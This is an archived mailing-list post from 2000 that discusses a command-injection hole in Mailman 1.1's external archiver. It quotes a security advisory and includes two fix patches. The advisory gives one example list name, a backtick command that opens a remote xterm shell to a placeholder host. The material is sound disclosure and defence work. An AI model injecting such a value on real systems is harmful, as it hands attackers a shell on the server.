[Mailman-Users] Mailman 1.1 + external archiver vulnerability
Todd Pfaff
pfaff at edge.cis.mcmaster.ca
Fri Sep 8 23:37:23 CEST 2000
I checked my mailman-1.1 installation to see if it was vulnerable as
indicated. It turned out that I could not exploit this hole because of a
patch that I had applied earlier to fix some other problem.
This patch ensures that the external archiver expansion of %(listname)s
uses the self._internal_name of the list rather than the real_name, which
can not be modified by the list admin. This patch does not prevent the
list admin from changing the real_name to something malicious, so it will
not protect against any other part of mailman-1.1 that has a vulnerable
external command call that can be influenced by a listname expansion.
IMHO, real_name was a bad choice for that property. I think a more
correct name for the admin-modifiable name property would have been
public_name, display_name or formatted_name.
Here's the patch:
--- Mailman/Archiver/Archiver.py.orig Fri Sep 3 23:16:02 1999
+++ Mailman/Archiver/Archiver.py Tue Feb 22 08:54:06 2000
@@ -183,7 +183,7 @@
post.SetHeader('Date', olddate)
def ExternalArchive(self, ar, txt):
- d = SafeDict({'listname': self.real_name})
+ d = SafeDict({'listname': self._internal_name})
cmd = ar % d
extarch = os.popen(cmd, 'w')
extarch.write(txt)
On Fri, 8 Sep 2000, Christopher P. Lindsey wrote:
> Date: Fri, 8 Sep 2000 14:16:12 -0500
> From: Christopher P. Lindsey <lindsey at mallorn.com>
> To: mailman-users at python.org
> Subject: [Mailman-Users] Mailman 1.1 + external archiver vulnerability
>
> SUMMARY
>
> Mailman from www.list.org is a mailing list manager with strong Web
> functionality. If a site is running Mailman 1.1 with an external
> archiving mechanism that uses the internal variable %(listname)s,
> list administrators can run any command with the Webserver's
> uid/gid.
>
> A patch is available at the end of this message.
>
> WHO'S VULNERABLE
>
> Sites running versions prior to Mailman 1.2beta with external
> archiving enabled.
>
> HISTORY
>
> This bug was reported to the developers in late November, 1999, and
> was fixed in the CVS source tree. Newer beta versions of Mailman
> are not susceptible, yet it has recently come to my attention
> that the vulnerable 1.1 package is still available as a stable,
> non-beta release on the Mailman site(s):
>
> ftp://ftp.list.org/pub/mailman/
> ftp://ftp.gnu.org/gnu/mailman/
>
> DETAILS
>
> Mailman has a mechanism that allows messages sent to a mailing list to
> be pumped into some sort of external program. Traditionally this
> involves some sort of Web-based archiver like MHonArc or hypermail.
> To make the archiving more powerful, macros can be used based on
> internal Mailman values. For example, list archives can be saved
> on a per list basis with this line in $prefix/Mailman/mm_cfg.py:
>
> PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
>
> The problem comes from the %(listname)s expansion. Since it's derived
> from a value that can be set on a per list basis by the list administrator,
> it's subject to tampering. Consider a list who's name was changed
> to
>
> `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`
>
> by a list administrator. As soon as a message is sent to the list
> this command will be executed, opening a remote xterm with a shell
> running with the Web server's uid/gid. Any command available to the
> Web server can be executed in this fashion.
>
> Other variable names can be accessed if your PUBLIC_EXTERNAL_ARCHIVER
> definition is configured to use them. The patch below will only
> fix problems with %(listname)s expansion.
>
> SOLUTION
>
> Upgrade to a later version of Mailman, or install the supplied patch.
>
> PATCH
>
> This patch was provided my the Mailman developers and later cleaned up
> to work against a stock 1.1 distribution. It works by only allowing
> listowners to change case values within the name of their list.
>
> Obviously a better long-term solution that sanitizes system calls, etc.
> should be considered.
>
> The purpose of this report is not to disrespect the Mailman
> team or the software, but rather to warn users who have been
> downloading the 1.1 package while waiting for the beta to emerge
> as a final release.
>
> Christopher Lindsey
> lindsey at mallorn.com
> Mallorn Computing, Inc.
>
> -------------------- snip snip --------------------
> *** admin.py.bak Mon Mar 13 21:03:53 2000
> --- admin.py Mon Mar 13 21:04:51 2000
> ***************
> *** 784,789 ****
> --- 784,800 ----
> val = cgi_info[property].value
> value = GetValidValue(lst, property, kind, val, deps)
> if getattr(lst, property) != value:
> + # TBD: Ensure that lst.real_name differs only in letter
> + # case. Otherwise a security hole can potentially be opened
> + # when using an external archiver. This seems ad-hoc and
> + # could use a more general security policy.
> + if property == 'real_name' and \
> + string.lower(value) <> string.lower(lst._internal_name):
> + # then don't install this value.
> + document.AddItem("""<p><b>real_name</b> attribute not
> + changed! It must differ from the list's name by case
> + only.<p>""")
> + continue
> setattr(lst, property, value)
> dirty = 1
> #
> -------------------- snip snip --------------------
>
>
> ------------------------------------------------------
> Mailman-Users maillist - Mailman-Users at python.org
> http://www.python.org/mailman/listinfo/mailman-users
>
--
Todd Pfaff \ Email: pfaff at mcmaster.ca
Computing and Information Services \ Voice: (905) 525-9140 x22920
ABB 132 \ FAX: (905) 528-3773
McMaster University \
Hamilton, Ontario, Canada L8S 4M1 \
More information about the Mailman-Users
mailing list